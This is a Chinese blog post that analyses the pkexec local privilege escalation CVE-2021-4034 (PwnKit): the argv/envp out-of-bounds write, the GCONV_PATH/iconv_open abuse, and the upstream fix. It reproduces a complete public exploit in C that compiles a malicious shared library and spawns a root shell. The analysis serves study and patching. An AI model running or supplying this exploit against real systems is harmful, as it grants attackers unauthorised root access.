CVE-2021-4034 pkexec提权漏洞分析
文章最后更新时间为:2022年02月07日 19:51:39
1. 漏洞描述
2022-01-25,CVE-2021-4034利用详情发布,该漏洞是Qualys研究团队在polkit的pkexec中发现的一个内存损坏漏洞,允许非特权用户获取root权限。根据作者的发布文章说,在默认安装的Ubuntu、Debian、Fedora和CentOS上都已经成功复现。这个漏洞已经隐藏了12年多,并影响自2009年5月第一个版本以来的所有pkexec版本:(commit c8c3d83,“Add a pkexec(1) command”)
polkit是一个授权管理器,其系统架构由授权和身份验证代理组成,如下图所示:
其中授权以基于system message bus上的服务实现,polkit没有取代系统已有的权限系统,而是在已有的群组和管理员上进行管控。如果开发时需要用到linux上的身份认证,可以基于polkit框架,编写rule授权规则实现。
而pkexec就是polkit中的一个组件,允许用户以另一个用户身份执行命令(用法类似于sudo):
$ pkexec --help
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
如果 PROGRAM未指定,将运行默认shell,如果username未指定,则程序将以管理超级用户root身份执行。
(以上命令在命令行其实无法直接复现,因为服务器没有desktop,可以参考https://gitlab.freedesktop.org/polkit/polkit/-/issues/17)
2. 漏洞分析
首先找到漏洞修复前的源码,这里选了一个0.12版本的源码:https://gitlab.freedesktop.org/polkit/polkit/-/blob/0.120/src/programs/pkexec.c
定位到pkexec的main()函数,在程序开头(534-568行)处理命令行参数:
然后在610行开始,会获取PROGRAM参数名称,也就是需要执行的程序。
这里有个溢出的问题,当我们执行pkexec,什么参数也不传递时,会发生以下情况:
- 在第 534 行,整数 n 永久设置为 1
- 在第 610 行,从 argv[1] 越界读取指针路径
- 在第 639 行,指针 s 被越界写入 argv[1]
但是从这个越界的argv[1]中读取和写入的到底是什么?当我们执行一个程序时,内核会将我们的参数、环境字符串和指针(argv 和 envp)复制到新程序堆栈的末尾;如下所示:
|---------+---------+-----+------------|---------+---------+-----+------------|
| argv[0] | argv[1] | ... | argv[argc] | envp[0] | envp[1] | ... | envp[envc] |
|----|----+----|----+-----+-----|------|----|----+----|----+-----+-----|------|
因为argv和envp指针在内存中是连续的,如果argc为0,那么越界argv[1]实际上是envp[0]。
我们可以做个实验研究下:
// a.c
#include <stdlib.h>
#include <stdio.h>
int main(int argc, char **argv, char** envp)
{
printf("argv[1]:%s\n", argv[1]);
}
// b.c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc, char *argv[]) {
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
NULL
};
execve("./a", a_argv, a_envp);
}
所以回到刚才的事故现场,看看会发生什么。
- 假设我们执行pkexec,此时argc=0,envp={"xxx"}
- 610行,程序会读取argv[1]到path变量中,也就是"xxx"
- 632行,
s = g_find_program_in_path (path)
找到该程序的绝对路径,假设为/usr/bin/xxx - 639行,程序将s写入argv[1]和path,从而覆盖了第一个环境变量。此时envp也就变成了{"/usr/bin/xxx"}
也就是说,这种越界写入允许我们将一个“不安全”的环境变量重新引入pkexec的环境。但是这个环境变量并不会存在太久,因为在702行,程序会清除所有的环境变量:
3. 漏洞利用(本地提权)
通过刚才的分析,可以看出pkexec存在溢出漏洞,允许我们导入不安全的环境变量,但是这个环境变量仅存在于639行~702行之间。
首先我们要知道pkexec是默认具有suid权限的
root@VM-12-15-ubuntu:~/test# ls -la /usr/bin/pkexec
-rwsr-xr-x 1 root root 31032 May 26 2021 /usr/bin/pkexec
suid权限这里就不再描述了,所以我们只要利用pkexec执行命令或者执行一段代码,就可以很容易拿到root权限,完成提权。
在pkexec中多次使用了g_printerr()函数,该函数是调用GLib的函数。但是如果环境变量CHARSET不是UTF-8,g_printerr()将会调用glibc的函数iconv_open(),来将消息从UTF-8转换为另一种格式。
iconv_open函数的执行过程为:iconv_open函数首先会找到系统提供的gconv-modules配置文件,这个文件中包含了各个字符集的相关信息存储的路径,每个字符集的相关信息存储在一个.so文件中,即gconv-modules文件提供了各个字符集的.so文件所在位置,之后会调用.so文件中的gconv()与gonv_init()函数。
如果我们改变了系统的GCONV_PATH环境变量,也就能改变gconv-modules配置文件的位置,从而执行一个恶意的so文件实现任意命令执行。
整个漏洞代码可以简化为如下程序:
#include <stdio.h>
#include <glib.h>
int main(int argc, char **argv, char** envp)
{
gchar *path;
gchar *s;
path = g_strdup (argv[1]);
printf("path:%s\n", path);
s = g_find_program_in_path (path);
printf("s:%s\n", s);
argv[1] = path = s;
g_printerr ("Error accessing\n");
}
// 编译:
// sudo apt-get install libglib2.0-dev
// gcc `pkg-config --cflags glib-2.0` a.c `pkg-config --libs glib-2.0` -o a
可以用此程序代替pkexec触发漏洞。
具体的利用过程如下:
- 首先一个gconv-modules配置文件,放置在./xxx目录下,其内容指向一个准备好的恶意so文件。
- 创建可执行文件xxx,放置在./GCONV_PATH=.目录下,注意目录名称为
GCONV_PATH=.
- 然后调用pkexec,argc=0,envp=
{"xxx","PATH=GCONV_PATH=.","LC_MESSAGES=en_US.UTF-8","XAUTHORITY=../LOL", NULL}
- pkexec执行到610行,path=xxx
- pkexec执行到632行,找到xxx的具体位置,因为我们制定了环境变量
PATH=GCONV_PATH=.
,所以会找到xxx的具体位置为GCONV_PATH=./xxx
- pkexec执行到636行,envp[0] = argv[1] = path=
GCONV_PATH=./xxx
,此时envp为{"GCONV_PATH=./xxx","PATH=GCONV_PATH=.","LC_MESSAGES=en_US.UTF-8"}
- pkexec执行到670行,调用validate_environment_variable函数,因为XAUTHORITY环境变量不合法,触发g_printerr函数,从而调用iconv_open()函数,找到gconv-modules配置文件:./xxx/gconv-modules,然后找到so文件,最终执行so文件。
我们只要在so文件的gonv_init()函数中,执行/bin/sh
即可拿到一个root权限的shell。
下面是exp,来自https://haxx.in/files/blasty-vs-pkexec.c
/*
* blasty-vs-pkexec.c -- by blasty <[email protected]>
* ------------------------------------------------
* PoC for CVE-2021-4034, shout out to Qualys
*
* ctf quality exploit
*
* bla bla irresponsible disclosure
*
* -- blasty // 2022-01-25
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
void fatal(char *f) {
perror(f);
exit(-1);
}
void compile_so() {
FILE *f = fopen("payload.c", "wb");
if (f == NULL) {
fatal("fopen");
}
char so_code[]=
"#include <stdio.h>\n"
"#include <stdlib.h>\n"
"#include <unistd.h>\n"
"void gconv() {\n"
" return;\n"
"}\n"
"void gconv_init() {\n"
" setuid(0); seteuid(0); setgid(0); setegid(0);\n"
" static char *a_argv[] = { \"sh\", NULL };\n"
" static char *a_envp[] = { \"PATH=/bin:/usr/bin:/sbin\", NULL };\n"
" execve(\"/bin/sh\", a_argv, a_envp);\n"
" exit(0);\n"
"}\n";
fwrite(so_code, strlen(so_code), 1, f);
fclose(f);
system("gcc -o payload.so -shared -fPIC payload.c");
}
int main(int argc, char *argv[]) {
struct stat st;
char *a_argv[]={ NULL };
char *a_envp[]={
"lol",
"PATH=GCONV_PATH=.",
"LC_MESSAGES=en_US.UTF-8",
"XAUTHORITY=../LOL",
"GIO_USE_VFS=",
NULL
};
printf("[~] compile helper..\n");
compile_so();
if (stat("GCONV_PATH=.", &st) < 0) {
if(mkdir("GCONV_PATH=.", 0777) < 0) {
fatal("mkdir");
}
int fd = open("GCONV_PATH=./lol", O_CREAT|O_RDWR, 0777);
if (fd < 0) {
fatal("open");
}
close(fd);
}
if (stat("lol", &st) < 0) {
if(mkdir("lol", 0777) < 0) {
fatal("mkdir");
}
FILE *fp = fopen("lol/gconv-modules", "wb");
if(fp == NULL) {
fatal("fopen");
}
fprintf(fp, "module UTF-8// INTERNAL ../payload 2\n");
fclose(fp);
}
printf("[~] maybe get shell now?\n");
execve("/usr/bin/pkexec", a_argv, a_envp);
}
4. 漏洞修复
可以看到漏洞修复非常简单:https://gitlab.freedesktop.org/polkit/polkit/-/commit/a2bf5c9c83b6ae46cbd5c779d3055bff81ded683
在溢出点,赋值前做了检查。
5. 参考文章
- https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034
- https://www.freedesktop.org/software/polkit/docs/latest/polkit.8.html
- https://www.freedesktop.org/software/polkit/docs/latest/pkexec.1.html
- https://www.cnblogs.com/wayneliu007/p/10321542.html
- https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt
文章写的真好,浅显易懂,对于pwn几乎0基础的我,都能看懂个大概,感谢师傅orz